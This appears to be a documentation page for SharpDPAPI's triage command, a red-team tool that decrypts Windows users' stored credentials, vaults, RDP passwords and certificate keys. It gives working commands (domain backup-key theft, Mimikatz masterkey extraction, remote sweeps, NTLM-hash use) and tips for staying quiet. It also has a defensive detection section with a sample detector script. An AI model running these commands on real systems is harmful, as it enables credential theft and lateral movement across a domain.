Overview

The triage command is a comprehensive wrapper that executes all user DPAPI extraction commands in a single run. It automatically triages credentials, vaults, RDG files, and certificates for all accessible users on the system.
This is the recommended starting point for user DPAPI triage. It runs the equivalent of the credentials, vaults, rdg, and certificates commands in sequence.

Basic Usage

# Triage with domain backup key
SharpDPAPI.exe triage /pvk:key.pvk

# Triage with user password
SharpDPAPI.exe triage /password:Password123!

# Triage with masterkey mappings
SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1

# Remote system triage
SharpDPAPI.exe triage /pvk:key.pvk /server:workstation.domain.com

Command Arguments

Decryption Methods

Supported decryption methods:
  • Domain Backup Key
  • User Credentials
  • Masterkey Mappings
  • RPC Decryption

Domain Backup Key (/pvk) examples:

# Base64-encoded key
SharpDPAPI.exe triage /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...

# Key file
SharpDPAPI.exe triage /pvk:key.pvk

Targeting Options

Argument            Description
/server:SERVER      Triage remote server (requires admin access and pvk/password)

When using /server, you must also supply either /pvk or /password for decryption.

What Gets Triaged

The triage command executes the following operations:

1. Credential Manager Credentials: searches %LOCALAPPDATA%\Microsoft\Credentials\ for all users and decrypts credential files
2. Windows Vaults: searches %LOCALAPPDATA%\Microsoft\Vault\ folders and decrypts vault data (browser passwords, etc.)
3. RDP Passwords: searches for RDCMan.settings and .rdg files containing saved RDP connection passwords
4. User Certificates: searches %APPDATA%\Microsoft\Crypto\RSA\ for user certificate private keys

Execution Context

  • Elevated
  • Unelevated

Elevated (run with administrative privileges):
  • Triages all users on the system
  • Accesses all user profile directories
  • Maximum data collection

Example Output

[*] Action: User DPAPI Credential Triage

[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!

[*] User master key cache:

{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
{feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4

[*] Triaging Credentials for ALL users

Folder       : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\

  CredFile           : 48C08A704ADBA03A93CD7EC5B77C0EAB
    guidMasterKey    : {885342c6-028b-4ecf-82b2-304242e769e0}
    description      : Local Credential Data
    LastWritten      : 1/22/2019 2:44:40 AM
    TargetName       : Domain:target=TERMSRV/10.4.10.101
    UserName         : DOMAIN\user
    Credential       : Password!

[*] Triaging Vaults for ALL users

[*] Triaging Vault folder: C:\Users\harmj0y\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

  VaultID            : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
  Name               : Web Credentials
    LastWritten      : 10/12/2018 12:10:42 PM
    FriendlyName     : Internet Explorer
    Identity         : admin
    Resource         : https://10.0.0.1/
    Authenticator    : Password!

[*] Triaging RDCMan Settings Files for ALL users

[*] Triaging User Certificates

Common Scenarios

After obtaining domain admin and retrieving the backup key:

# 1. Get backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Triage local system
SharpDPAPI.exe triage /pvk:key.pvk

# 3. Triage multiple remote systems
SharpDPAPI.exe triage /pvk:key.pvk /server:ws01.domain.com
SharpDPAPI.exe triage /pvk:key.pvk /server:ws02.domain.com
SharpDPAPI.exe triage /pvk:key.pvk /server:dc.domain.com

Using Mimikatz-extracted masterkeys:

# 1. Extract masterkeys with Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# 2. Run triage with extracted keys
SharpDPAPI.exe triage {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad...

When you have a specific user's credentials:

# Using password
SharpDPAPI.exe triage /password:SecurePassword123

# Using NTLM hash
SharpDPAPI.exe triage /ntlm:8846F7EAEE8FB117AD06BDD830B7586C

Detection Considerations

The triage command generates significant host activity that can be detected.

Detection Indicators:
  • Bulk access to multiple users’ DPAPI directories
  • Reading of Credential Manager files
  • Access to Vault folders across user profiles
  • Enumeration of certificate stores
  • Potential LSASS access (if masterkeys are extracted)

Defensive Monitoring:
  • Monitor bulk access to %LOCALAPPDATA%\Microsoft\Credentials\
  • Alert on access to %LOCALAPPDATA%\Microsoft\Vault\
  • Track certificate private key file access
  • Monitor for process accessing multiple user profiles
  • Detect non-standard processes reading DPAPI protected data
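The first four indicators above share one observable: a single process reading DPAPI-protected files under several different user profiles in a short span. The following detector is an added example (not part of SharpDPAPI or this page) that models Windows Security event 4663 file-access records produced by SACL auditing on the Credentials, Vault and Crypto\RSA directories. The event records, process names and timestamps are constructed for the example; only the directory paths come from the page.

```python
"""Constructed example: flag a process that reads DPAPI-protected files
belonging to several user profiles within a short window.  Input records
model Windows Security event 4663 (object access) as produced by SACL
auditing on the directories the triage command touches."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Directories the page lists as triage targets (%LOCALAPPDATA% and %APPDATA%
# expanded to their on-disk locations under a user profile).
DPAPI_PATH_RE = re.compile(
    r"^[A-Za-z]:\\Users\\(?P<user>[^\\]+)\\AppData\\"
    r"(?:Local\\Microsoft\\(?:Credentials|Vault)|Roaming\\Microsoft\\Crypto\\RSA)\\",
    re.IGNORECASE,
)

# Constructed sample of 4663 events (only the fields the detector needs).
# pid 4120 touches three profiles in a few seconds; pid 812 touches only one.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "pid": 4120, "process": r"C:\Temp\tool.exe",
     "object": r"C:\Users\alice\AppData\Local\Microsoft\Credentials\48C08A704ADBA03A93CD7EC5B77C0EAB"},
    {"time": "2024-05-01T10:00:02", "pid": 4120, "process": r"C:\Temp\tool.exe",
     "object": r"C:\Users\bob\AppData\Local\Microsoft\Credentials\1A2B3C4D5E6F"},
    {"time": "2024-05-01T10:00:03", "pid": 4120, "process": r"C:\Temp\tool.exe",
     "object": r"C:\Users\bob\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol"},
    {"time": "2024-05-01T10:00:04", "pid": 812, "process": r"C:\Windows\System32\svchost.exe",
     "object": r"C:\Users\alice\AppData\Local\Microsoft\Credentials\48C08A704ADBA03A93CD7EC5B77C0EAB"},
    {"time": "2024-05-01T10:00:05", "pid": 4120, "process": r"C:\Temp\tool.exe",
     "object": r"C:\Users\carol\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1\keyfile"},
    {"time": "2024-05-01T10:00:06", "pid": 4120, "process": r"C:\Temp\tool.exe",
     "object": r"C:\Users\alice\Documents\notes.txt"},          # not DPAPI, ignored
    {"time": "2024-05-01T10:20:00", "pid": 4120, "process": r"C:\Temp\tool.exe",
     "object": r"C:\Users\dave\AppData\Local\Microsoft\Credentials\99AA"},  # outside window
]


def dpapi_user(path):
    """Return the profile user name if `path` lies under a DPAPI-protected
    directory, otherwise None."""
    m = DPAPI_PATH_RE.match(path)
    return m.group("user") if m else None


def find_bulk_dpapi_access(events, window=timedelta(minutes=5), min_profiles=2):
    """Return {(pid, process): [users]} for each process that read
    DPAPI-protected files of at least `min_profiles` distinct user profiles
    within any span of length `window`.  The user list is the largest such
    set found for that process."""
    per_proc = defaultdict(list)
    for ev in events:
        user = dpapi_user(ev["object"])
        if user is None:
            continue  # unrelated file access
        per_proc[(ev["pid"], ev["process"])].append(
            (datetime.fromisoformat(ev["time"]), user))

    hits = {}
    for key, accesses in per_proc.items():
        accesses.sort()
        best = set()
        # Sliding window anchored at each access; O(n^2) is fine for a
        # per-host event stream of this size.
        for i, (t0, _) in enumerate(accesses):
            seen = {u for t, u in accesses[i:] if t - t0 <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_profiles:
            hits[key] = sorted(best)
    return hits


if __name__ == "__main__":
    for (pid, proc), users in find_bulk_dpapi_access(SAMPLE_EVENTS).items():
        print(f"ALERT pid={pid} {proc} read DPAPI data for profiles: {', '.join(users)}")
```

The window and profile threshold are the tuning knobs: a backup agent or a user's own browser reads one profile's Credentials and Vault folders routinely, so a single-profile process never fires, while anything crossing profile boundaries within a few minutes does. The same match on object path can be used to raise a separate alert whenever the accessing process is not a known system binary, which covers the fifth indicator in the list above.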

Tips

  • Use /mkfile instead of inline masterkeys for better performance
  • Target specific users when possible instead of triaging all users
  • Use individual commands (credentials, vaults) if you only need specific data types
  • Run without elevation to only triage current user (less noisy)
  • Use /unprotect for RDG files when possible (no masterkeys needed)
  • Target specific remote systems instead of broad sweeps
  • Redirect output to file with /consoleoutfile to minimize artifacts

No data decrypted:
  • Verify decryption method is correct (pvk, password, masterkeys)
  • Check if DPAPI data actually exists for target users
  • Ensure proper permissions to read user profile directories

Access denied errors:
  • Elevate to Administrator for multi-user triage
  • Verify remote admin access for /server operations
  • Check if target files are locked or in use